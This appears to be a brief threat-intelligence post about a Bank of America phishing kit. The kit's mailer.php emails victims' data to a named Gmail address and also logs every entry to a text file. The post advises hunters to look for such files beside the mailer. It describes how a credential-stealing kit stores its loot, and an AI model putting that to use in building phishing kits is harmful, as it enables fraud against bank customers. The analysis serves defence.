Phishing Kit that writes stolen data to a Text File

This Bank of America Phishing kit
https://www.virustotal.com/en/file/c5d63a632c8d6f972d8c598f8f4f8c488199734a73356f2393e20f30bea26955/analysis/1515876239/

Contains a file called "mailer.php"

And if you look inside it does the usual email sending to threat actor trevor.owenus2@gmail.com

But also at the bottom it decides to append every entry to a text file as well

So when hunting for phishing websites, it's also occasionally worth looking for text files sitting next to the php mailer , as they may actually contain a list of all victims.